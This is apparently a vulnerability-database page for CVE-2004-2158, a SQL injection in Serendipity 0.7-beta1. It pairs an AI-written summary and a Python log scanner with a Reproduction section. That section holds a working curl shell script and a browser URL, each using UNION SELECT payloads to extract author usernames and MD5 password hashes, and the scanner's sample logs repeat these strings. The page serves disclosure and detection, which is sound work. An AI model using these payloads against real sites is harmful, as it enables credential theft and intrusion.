CVE-2004-2158
Description
SQL injection in Serendipity 0.7-beta1 allows remote attackers to extract author credentials via entry_id parameter in exit.php and comment.php.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
Serendipity version 0.7-beta1 is vulnerable to SQL injection. Remote attackers can exploit this by sending specially crafted input to the entry_id parameter in exit.php or comment.php.
Exploitation
An attacker can exploit this vulnerability by sending a malicious request to either exit.php or comment.php with a modified entry_id parameter. For example, they can use a union-based SQL injection to retrieve usernames and MD5 hashes of passwords from the serendipity_authors table [1].
Impact
Successful exploitation allows an attacker to extract sensitive information, specifically usernames and MD5-hashed passwords of authors, from the application's database. This could lead to unauthorized access or further compromise of the system.
Mitigation
There is no specific mitigation or patched version information available in the provided references. Users are advised to upgrade to a non-vulnerable version of Serendipity if available, or to apply any security patches released by the vendor. The vulnerability affects version 0.7-beta1 [1].
AI Insight generated on Jun 3, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: = 0.7-beta1
- Range: = 0.7-beta1
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"The entry_id parameter is not properly sanitized before being used in SQL queries."
Attack vector
Remote attackers can exploit this vulnerability by sending specially crafted requests to the affected scripts. By manipulating the `entry_id` parameter in `exit.php` or `comment.php`, attackers can inject arbitrary SQL commands. The exploit attempts to extract `username` and `password` from the `serendipity_authors` table by using a `UNION SELECT` statement [1]. This bypasses intended application logic and allows for data exfiltration.
Affected code
The vulnerability is present in the `exit.php` and `comment.php` scripts of Serendipity version 0.7-beta1. Specifically, the `entry_id` parameter in these scripts is susceptible to SQL injection.
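A log check for the parameter described above, as an added example that is not part of the advisory or of Serendipity: it flags requests to `exit.php` or `comment.php` whose decoded `entry_id` is not a plain integer. It assumes Common/Combined Log Format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script and parameter names are the ones named in the advisory text on this page.
SCRIPTS = ("/exit.php", "/comment.php")
PARAMS = ("entry_id", "serendipity[entry_id]")
# Request field of a Common/Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_entry_id(log_line):
    """Return the decoded entry_id value if it is not a plain integer, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not target.path.endswith(SCRIPTS):
        return None
    # parse_qsl percent-decodes names and values, so %20, %3D and %5B..%5D are normalised.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name in PARAMS and not re.fullmatch(r"\d+", value):
            return value
    return None


def scan(lines):
    """Yield (line_number, decoded_value) for every flagged request."""
    for n, line in enumerate(lines, 1):
        value = suspicious_entry_id(line)
        if value is not None:
            yield n, value


# Constructed sample log lines (192.0.2.0/24 is a documentation address range).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /blog/exit.php?url_id=1&entry_id=12 HTTP/1.1" 302 -',
    '192.0.2.66 - - [01/Jan/2024:10:00:05 +0000] "HEAD /blog/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20username%20from%20serendipity_authors%20where%20authorid%3D1 HTTP/1.1" 302 -',
    '192.0.2.66 - - [01/Jan/2024:10:00:09 +0000] "GET /blog/comment.php?serendipity%5Btype%5D=trackbacks&serendipity%5Bentry_id%5D=0%20and%200%20union%20select%201,2,3 HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /blog/index.php?entry_id=abc HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: non-numeric entry_id -> {value!r}")
```

Matching on "not an integer" rather than on SQL keywords keeps the check independent of the exact payload and of how it was encoded.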
What the fix does
The provided bundle does not contain information about a patch or specific remediation steps. The advisory indicates that the vulnerability exists in version 0.7-beta1 and suggests that updating to a later version would likely resolve the issue. Without a patch diff, the exact fix cannot be detailed.
Preconditions
- input: The `entry_id` parameter must be controllable by the attacker.
- network: The attacker must be able to send HTTP requests to the vulnerable web server.
Reproduction
Proof of Concept 1
------------------

Usage: ./ser_sqli_poc.sh URL_to_Serendipity_Weblog

ser_sqli_poc.sh

```sh
#!/bin/sh
echo -n "Username: "
curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20username%20from%20serendipity_authors%20where%20authorid%3D1" | grep Location | cut -b10-
echo -n "MD5(password): "
curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20password%20from%20serendipity_authors%20where%20authorid%3D1" | grep Location | cut -b10-
```

Proof of Concept 2
------------------

Copy&Paste this to your browser and edit URL_to_Serendipity_Weblog.

```
http://URL_to_Serendipity_Weblog/comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20/*
```
Generated on Jun 3, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- secunia.com/advisories/12673/ (nvd: Patch, Vendor Advisory)
- lists.grok.org.uk/pipermail/full-disclosure/2004-September/026955.html (nvd: Exploit, Vendor Advisory)
- securitytracker.com/id (nvd: Exploit, Patch)
- www.securityfocus.com/bid/11269 (nvd: Exploit, Patch)
- www.osvdb.org/10370 (nvd)
- www.osvdb.org/10371 (nvd)
- exchange.xforce.ibmcloud.com/vulnerabilities/17533 (nvd)